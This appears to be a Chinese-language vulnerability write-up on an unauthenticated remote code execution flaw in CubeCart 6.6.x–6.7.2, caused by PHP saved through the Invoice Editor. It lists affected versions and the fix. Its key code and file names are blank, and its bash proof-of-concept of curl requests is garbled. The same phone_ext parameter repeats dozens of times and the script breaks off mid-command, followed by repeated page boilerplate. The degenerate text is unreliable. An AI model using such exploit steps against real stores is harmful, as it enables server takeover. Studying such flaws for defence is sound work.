CubeCart 6.6.x-6.7.2 未授权远程代码执行漏洞分析

漏洞概述 在 CubeCart 6.6.x 到 6.7.2 版本中，具有 编辑权限的管理员可以将包含 的原始 PHP 代码保存到 Invoice Editor。当任何用户点击订单上的 Print 按钮时，渲染的模板会被写入 。 文件允许所有用户访问 文件，导致未认证的访问者可以执行这些文件。 影响范围 受影响版本：6.6.x 到 6.7.2 修复版本：6.7.3 修复方案 1. 在写入打印文件之前剥离 PHP 开放标签： 2. 深度防御 - 重命名文件并收紧 ： POC 代码 ```bash 1) Create an order via the admin UI TOKEN=$(curl -sb COOKIE "$HOST/admin.php?g=orders&action=add" \ curl -sb COOKIE \ --data-urlencode "customer[first_name]=" --data-urlencode "customer[last_name]=" \ --data-urlencode "customer[email]=test@test.com" --data-urlencode "customer[phone]=1234567890" \ --data-urlencode "customer[address1]=123 Main St" --data-urlencode "customer[address2]=Apt 4" \ --data-urlencode "customer[city]=Anytown" --data-urlencode "customer[state]=CA" \ --data-urlencode "customer[country]=US" --data-urlencode "customer[postcode]=12345" \ --data-urlencode "customer[phone]=1234567890" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-urlencode "customer[phone_ext]=123" \ --data-urlencode "customer[phone_ext]=123" --data-

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

CubeCart 6.6.x-6.7.2 未授权远程代码执行漏洞分析

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CubeCart 6.6.x-6.7.2 未授权远程代码执行漏洞分析

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！